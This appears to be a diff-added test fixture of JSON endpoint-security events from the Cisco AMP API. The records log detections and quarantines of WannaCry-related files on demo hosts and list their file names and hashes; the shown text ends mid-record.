+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity 
